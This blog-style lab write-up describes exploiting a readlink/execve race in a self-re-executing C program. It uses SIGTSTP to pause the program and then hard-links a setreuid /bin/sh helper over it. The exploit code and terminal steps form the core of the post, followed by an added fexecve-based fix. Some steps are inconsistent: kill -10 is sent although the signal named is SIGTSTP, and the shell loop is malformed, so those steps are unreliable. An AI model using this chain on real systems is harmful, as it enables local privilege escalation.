
[Docs] Race Condition Exploit with Unix Signal


This is the first time I have learned about a race condition exploit with a Unix signal.

What a fresh idea!!


Example Code

```c
#include <unistd.h>

int main(int argc, char *argv[]) {
    char buf[4096];

    if (argc < 2) {
        // Step 1: resolve our own path through /proc/self/exe.
        ssize_t n = readlink("/proc/self/exe", buf, sizeof(buf) - 1);
        if (n < 0) return 1;
        buf[n] = '\0';  // readlink does not NUL-terminate

        // Step 2: execute that path again with "1" as the argument.
        // The gap between step 1 and step 2 is the race window.
        char *args[] = { buf, "1", 0 };
        if (execve(args[0], args, 0) < 0) return 1;
    }

    return 0;
}
// Sourced by StalkR
```

What this program does is:

When argc is less than 2, it gets its own path (/proc/self/exe) with readlink, then runs that program again with execve.

That's all.

The first time I saw this source, I wondered: how could I exploit it? What could I use?

I searched, and finally found "Race Condition Exploit with Unix Signal", written by pwn3r.


What is a Unix Signal?

Description of Unix signals: http://en.wikipedia.org/wiki/Unix_signal

In short, a signal is how a process (or thread) is informed that a specific event has occurred.

 

The signal we use today is the one below:

SIGTSTP 20 Terminal stop signal (POSIX)

 

The idea is: deliver SIGTSTP between readlink and execve (the process is stopped at that point), then replace the original program with what we want to execute.

What we want to execute is /bin/sh.

So what we need to build is:

- a program which sends the SIGTSTP signal

- a program which executes /bin/sh

First, send the SIGTSTP signal to stop the vulnerable program.

Then, replace the program with the one which executes /bin/sh.

 

This is how the exploit goes:

```c
#include <stdio.h>
#include <signal.h>
#include <unistd.h>

// Catching SIGTSTP keeps this launcher from being stopped itself.
void signal_handler(int signo){
    printf("Run~!\n");
}

int main(){
    signal(SIGTSTP, signal_handler);
    sleep(20);  // returns early as soon as SIGTSTP is caught
    // exec the vulnerable program; argc stays below 2, so it re-executes itself
    execl("/home/Desktop/Lab/rc", "rc", (char *)NULL);
    return 1;   // only reached if execl fails
}
```

When SIGTSTP is received, signal_handler runs, sleep() returns early, and the execl call is executed. This is why we register the signal handler.

If you don't register a handler, this program itself might be stopped by SIGTSTP as well.

```c
#include <sys/types.h>
#include <unistd.h>

// The program that gets linked over ./rc
int main(){
    setreuid(geteuid(), geteuid());  // make the real uid match the effective uid
    execl("/bin/sh", "sh", (char *)NULL);
    return 1;                        // only reached if execl fails
}
```

Conclusion

```
Terminal 1
zero@ubuntu:~Desktop/Lab$./rc

Terminal 2
zero@ubuntu:~Desktop/Lab$ while[1]; do kill -10 pid; done

Terminal 1
zero@ubuntu:~Desktop/Lab$./rc
Run~!

 [1]+ Stopped ./rc

Terminal 2
zero@ubuntu:~Desktop/Lab$ ln -f ./shell ./rc

And Continue the process...

Terminal 1
zero@ubuntu:~Desktop/Lab$fg 1
./sig
#
```

This is the end.
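The root cause is that rc resolves its own path and then executes that path, so whoever swaps the directory entry in between wins the race. As an added example (my own code, not StalkR's program or pwn3r's write-up), the hardened form below opens /proc/self/exe and hands the descriptor to fexecve(), so the kernel executes the inode already held instead of re-resolving a path; demo_entry_swap() uses constructed temp files under /tmp to show that a held descriptor is unaffected when its entry is replaced. The names fd_matches_path, reexec_self and demo_entry_swap are mine.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
extern char **environ;

/* 1 if the directory entry `path` still names the inode `fd` was opened on,
 * 0 if the entry has been swapped (what "ln -f ./shell ./rc" does), -1 on error. */
int fd_matches_path(int fd, const char *path) {
    struct stat by_fd, by_path;
    if (fstat(fd, &by_fd) < 0 || stat(path, &by_path) < 0) return -1;
    return by_fd.st_dev == by_path.st_dev && by_fd.st_ino == by_path.st_ino;
}

/* Hardened re-exec: open the running image and pass the descriptor to fexecve().
 * The kernel executes the inode behind the fd, so there is no path lookup between
 * "find myself" and "run myself" for anyone to race. Returns only on failure. */
int reexec_self(char *const argv[]) {
    int fd = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
    if (fd < 0) return -1;
    fexecve(fd, argv, environ);
    close(fd);
    return -1;
}

/* Why the descriptor is the right handle: swap the entry under a held fd
 * (constructed temp files, not real binaries) and observe the fd is unaffected.
 * Returns 1 when the entry matched before the swap and no longer does after it. */
int demo_entry_swap(void) {
    char rc[] = "/tmp/rc_demo_XXXXXX", shell[] = "/tmp/shell_demo_XXXXXX";
    int fd_rc = mkstemp(rc), fd_shell = mkstemp(shell);
    if (fd_rc < 0 || fd_shell < 0) return -1;
    int before = fd_matches_path(fd_rc, rc);   /* 1: "rc" names fd_rc's inode */
    if (rename(shell, rc) < 0) return -1;       /* atomic entry swap, like ln -f */
    int after = fd_matches_path(fd_rc, rc);    /* 0: "rc" now names the other inode */
    close(fd_rc); close(fd_shell); unlink(rc);
    return before == 1 && after == 0;
}

int main(int argc, char *argv[]) {
    printf("entry swap demo: %s\n", demo_entry_swap() == 1 ? "fd unaffected" : "error");
    if (argc < 2) {
        char *args[] = { argv[0], "1", NULL };
        if (reexec_self(args) < 0) return 1;   /* mirrors rc, without the race window */
    }
    return 0;
}
```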

 

Ref : http://pwn3r.tistory.com/entry/Docs-Exploiting-Race-Condition-Vulnerability-with-Unix-Signal

 

Epilogue

Race Condition Exploit with Unix Signal ... Cool Exploit!